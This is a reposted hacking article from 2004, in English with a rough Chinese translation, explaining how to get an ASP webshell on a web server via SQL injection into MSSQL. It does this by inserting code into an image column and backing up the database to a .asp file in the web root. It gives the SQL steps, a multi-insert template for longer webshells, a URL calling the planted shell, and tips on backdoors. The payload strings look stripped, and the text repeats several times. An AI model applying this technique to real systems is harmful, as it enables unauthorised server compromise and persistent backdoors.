用BACKUP得到一个asp的shell
2004-11-16 19:47
369 查看
This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her(July 2003). You don't need the sa privilege, just a dbowner is Okay.
这是一篇关于通过SQL注射MSSQL数据库得到webshell的文章。自从我发现这个漏洞(2003年7月)以来,这个方法基本是有效的。你不许要有sa权限,只要是一个一个数据库所有者就行了、
Open your Query Analyzer, following steps will generate a strange but useable webshell(suppose your web root is g:/wwwtest and the database model is intact)
use model;
create table cmd (str image);
insert into cmd(str) values ('');
backup database model to disk='g:/wwwtest/l.asp';
打开你的Query分析器,按照说明步骤操作,你将生成一个奇怪的当示范实用的webshell.(假设你的网页的根目录是g:/wwwtes 并且要操作的数据库model是完整的)
use model;
create table cmd (str image);
insert into cmd(str) values ('');
backup database model to disk='g:/wwwtest/l.asp'
Click run and the database model has been backuped into the web publish directory. Download? No, visit this file, you have got the shell...
http://202.119.9.42/l.asp?c=dir
点击运行。数据库 model已经被备份倒网站的发布目录。下载?不使用这个文件你就得到了shell
http://202.119.9.42/l.asp?c=dir
Here is the explanation: the ASP(VB) interpreter will ignore the characters those not between "", so naming the backup file as .asp and visiting it won't cause a 500 error if it contains no "". By default, the database stores its data in a "loose" way(e.g. the stored string "Time" will be seen in the backup file as the type of "T i m e"), so the probability that the backup file contains "" is low. These are two preconditions.
解释:ASP(VB)解释器会忽略""之间的字。如果备份文件不包括""将备份文件命名为.asp 并访问它不会产生 500 错误。缺省下,数据库以一种"松散"的方法来储存它的数据(比如,储存的排序"Time"在备份文件中将会是"T i m e"类型的),因此,备份文件很有可能丢失""。这是两前提。
But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell!
当我们怎么将它构造成webshell呢?镜像和一般的文件存储模式是不同的。我们说写入的数据备份文件将以原样的格式保存,因此我们以镜像类型插入数据库的数据不会以松散的在备份文件中存在而是原始类型。一旦我们以镜像的分段创建一个表,并插入一些恶意代码我可以备份一个shell.
Er, here also are some cons:
1) the output directort should be the physical web directory. Usually, we can only guess. For virtual host, perhaps we could reveal the path in other sites and other ways.
2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way.
两点局限性
1) The 输入目录必须时物理的网站目录。通常的情况下我们只要去猜。对于虚礼主机,我们暴露路径在其他的站点。
2)数据库访问者要有备份的权限。一些变态的网管只会给选择和插入的权限。一旦你遇到这样色网管放弃这种方法。
Here are the pros:
1) it will give you the webshell once your have the backup privilege. A dbowner have that!
2) it gives a new method of putting backdoor. Suppose your database is ACCESS, and you name it .asp to prevent from downloading. It COULD be a webshell ;)
两点好处
1) 它可以给你webshell,只要你有备份的权限。一个数据库的主人就有这个权限。
2) 这给了一个新的方法去开后门。假设你的数据库是access的你,命名它.asp防止被下载,他可能是一个webshell.
Oh, I nearly forget the most important thing: data which are in different insert phrases are NOT tangent, that means if your webshell codes are too long, you should do as the follow:
我差点忘记最重要的数据在不同的插入语句中接触的,如果你的webshell代码太长可以像一些这样处理。
========= CUT ME HERE ======================================================
use model
create table cmd (str image);
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('" method="POST">');
insert into cmd(str) values ('
');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');backup database model to disk='c:/l.asp';========= CUT ME HERE ====================================================== To those who did not successfully get the shell: Make your testing database(e.g. model) INTACT.如果没有成功得到shell测试数据库的完整性。To those who surf on the web: declare @a sysname; select @a=db_name()对那些网上的弄潮儿To those who thought it is too simple: Try the way backup log or think about how to access all file in a similar way ;)对于那些觉得很简单的,尝试这种办法备份日志或者想想怎样访问所有的文件用类似的方法、Greets: All SST Members. Yang Shuo, my girl friend. 编者:以上是为了方便英文不好的朋友大致翻译了下,下面是辣m从国外网站找的原文:Backup a shell]From : SST (www.0x557.org)Author : Swan (Swan[at]0x557[dot]org) This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her(July 2003). You don't need the sa privilege, just a dbowner is Okay. Open your Query Analyzer, following steps will generate a strange but useable webshell(suppose your web root is g:/wwwtest and the database model is intact)use model;create table cmd (str image);insert into cmd(str) values ('');backup database model to disk='g:/wwwtest/l.asp'; Click run and the database model has been backuped into the web publish directory. Download? No, visit this file, you have got the shell...http://202.119.9.42/l.asp?c=dir Here is the explanation: the ASP(VB) interpreter will ignore the characters those not between "", so naming the backup file as .asp and visiting it won't cause a 500 error if it contains no "". By default, the database stores its data in a "loose" way(e.g. the stored string "Time" will be seen in the backup file as the type of "T i m e"), so the probability that the backup file contains "" is low. These are two preconditions. But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell! Er, here also are some cons:1) the output directort should be the physical web directory. Usually, we can only guess. For virtual host, perhaps we could reveal the path in other sites and other ways.2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way. Here are the pros:1) it will give you the webshell once your have the backup privilege. A dbowner have that!2) it gives a new method of putting backdoor. Suppose your database is ACCESS, and you name it .asp to prevent from downloading. It COULD be a webshell ;)3) ... Oh, I nearly forget the most important thing: data which are in different insert phrases are NOT tangent, that means if your webshell codes are too long, you should do as the follow:========= CUT ME HERE ======================================================use modelcreate table cmd (str image);insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values (' " method="POST">');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');backup database model to disk='c:/l.asp';========= CUT ME HERE ====================================================== To those who did not successfully get the shell: Make your testing database(e.g. model) INTACT.To those who surf on the web: declare @a sysname; select @a=db_name()To those who thought it is too simple: Try the way backup log or think about how to access all file in a similar way ;)Greets: All SST Members. Yang Shuo, my girl friend.
这是一篇关于通过SQL注射MSSQL数据库得到webshell的文章。自从我发现这个漏洞(2003年7月)以来,这个方法基本是有效的。你不许要有sa权限,只要是一个一个数据库所有者就行了、
Open your Query Analyzer, following steps will generate a strange but useable webshell(suppose your web root is g:/wwwtest and the database model is intact)
use model;
create table cmd (str image);
insert into cmd(str) values ('');
backup database model to disk='g:/wwwtest/l.asp';
打开你的Query分析器,按照说明步骤操作,你将生成一个奇怪的当示范实用的webshell.(假设你的网页的根目录是g:/wwwtes 并且要操作的数据库model是完整的)
use model;
create table cmd (str image);
insert into cmd(str) values ('');
backup database model to disk='g:/wwwtest/l.asp'
Click run and the database model has been backuped into the web publish directory. Download? No, visit this file, you have got the shell...
http://202.119.9.42/l.asp?c=dir
点击运行。数据库 model已经被备份倒网站的发布目录。下载?不使用这个文件你就得到了shell
http://202.119.9.42/l.asp?c=dir
Here is the explanation: the ASP(VB) interpreter will ignore the characters those not between "", so naming the backup file as .asp and visiting it won't cause a 500 error if it contains no "". By default, the database stores its data in a "loose" way(e.g. the stored string "Time" will be seen in the backup file as the type of "T i m e"), so the probability that the backup file contains "" is low. These are two preconditions.
解释:ASP(VB)解释器会忽略""之间的字。如果备份文件不包括""将备份文件命名为.asp 并访问它不会产生 500 错误。缺省下,数据库以一种"松散"的方法来储存它的数据(比如,储存的排序"Time"在备份文件中将会是"T i m e"类型的),因此,备份文件很有可能丢失""。这是两前提。
But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell!
当我们怎么将它构造成webshell呢?镜像和一般的文件存储模式是不同的。我们说写入的数据备份文件将以原样的格式保存,因此我们以镜像类型插入数据库的数据不会以松散的在备份文件中存在而是原始类型。一旦我们以镜像的分段创建一个表,并插入一些恶意代码我可以备份一个shell.
Er, here also are some cons:
1) the output directort should be the physical web directory. Usually, we can only guess. For virtual host, perhaps we could reveal the path in other sites and other ways.
2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way.
两点局限性
1) The 输入目录必须时物理的网站目录。通常的情况下我们只要去猜。对于虚礼主机,我们暴露路径在其他的站点。
2)数据库访问者要有备份的权限。一些变态的网管只会给选择和插入的权限。一旦你遇到这样色网管放弃这种方法。
Here are the pros:
1) it will give you the webshell once your have the backup privilege. A dbowner have that!
2) it gives a new method of putting backdoor. Suppose your database is ACCESS, and you name it .asp to prevent from downloading. It COULD be a webshell ;)
两点好处
1) 它可以给你webshell,只要你有备份的权限。一个数据库的主人就有这个权限。
2) 这给了一个新的方法去开后门。假设你的数据库是access的你,命名它.asp防止被下载,他可能是一个webshell.
Oh, I nearly forget the most important thing: data which are in different insert phrases are NOT tangent, that means if your webshell codes are too long, you should do as the follow:
我差点忘记最重要的数据在不同的插入语句中接触的,如果你的webshell代码太长可以像一些这样处理。
========= CUT ME HERE ======================================================
use model
create table cmd (str image);
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('" method="POST">');
insert into cmd(str) values ('
');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');backup database model to disk='c:/l.asp';========= CUT ME HERE ====================================================== To those who did not successfully get the shell: Make your testing database(e.g. model) INTACT.如果没有成功得到shell测试数据库的完整性。To those who surf on the web: declare @a sysname; select @a=db_name()对那些网上的弄潮儿To those who thought it is too simple: Try the way backup log or think about how to access all file in a similar way ;)对于那些觉得很简单的,尝试这种办法备份日志或者想想怎样访问所有的文件用类似的方法、Greets: All SST Members. Yang Shuo, my girl friend. 编者:以上是为了方便英文不好的朋友大致翻译了下,下面是辣m从国外网站找的原文:Backup a shell]From : SST (www.0x557.org)Author : Swan (Swan[at]0x557[dot]org) This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her(July 2003). You don't need the sa privilege, just a dbowner is Okay. Open your Query Analyzer, following steps will generate a strange but useable webshell(suppose your web root is g:/wwwtest and the database model is intact)use model;create table cmd (str image);insert into cmd(str) values ('');backup database model to disk='g:/wwwtest/l.asp'; Click run and the database model has been backuped into the web publish directory. Download? No, visit this file, you have got the shell...http://202.119.9.42/l.asp?c=dir Here is the explanation: the ASP(VB) interpreter will ignore the characters those not between "", so naming the backup file as .asp and visiting it won't cause a 500 error if it contains no "". By default, the database stores its data in a "loose" way(e.g. the stored string "Time" will be seen in the backup file as the type of "T i m e"), so the probability that the backup file contains "" is low. These are two preconditions. But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell! Er, here also are some cons:1) the output directort should be the physical web directory. Usually, we can only guess. For virtual host, perhaps we could reveal the path in other sites and other ways.2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way. Here are the pros:1) it will give you the webshell once your have the backup privilege. A dbowner have that!2) it gives a new method of putting backdoor. Suppose your database is ACCESS, and you name it .asp to prevent from downloading. It COULD be a webshell ;)3) ... Oh, I nearly forget the most important thing: data which are in different insert phrases are NOT tangent, that means if your webshell codes are too long, you should do as the follow:========= CUT ME HERE ======================================================use modelcreate table cmd (str image);insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values (' " method="POST">');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');insert into cmd(str) values ('');backup database model to disk='c:/l.asp';========= CUT ME HERE ====================================================== To those who did not successfully get the shell: Make your testing database(e.g. model) INTACT.To those who surf on the web: declare @a sysname; select @a=db_name()To those who thought it is too simple: Try the way backup log or think about how to access all file in a similar way ;)Greets: All SST Members. Yang Shuo, my girl friend.
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- IE拖放漏洞详解二
- 实战SWT布局
- Shell 编程(1)(2)(3)
- (转载)Exploit,shellcode经验技巧杂谈
- (转载)Shellcode编写技术
- (转载)关于Windows下ShellCode编写的一点思考
- (转载)通用ShellCode深入剖析
- Bash 实例,第 3 部分
- Bash 实例,第二部分
- Bash 实例,第一部分
- 俄罗斯方块Shell
- Linux Shell
- Bash中的变量
- dark cmd d.bat v isgrey(编写ing)
- Linux shell入门基础
- Shell编程
- The UNIX Shell
- UNIX中用shell作应用中的操作方法
- Advances in Windows Shellcode
- 一个echo文件的程序 [转载]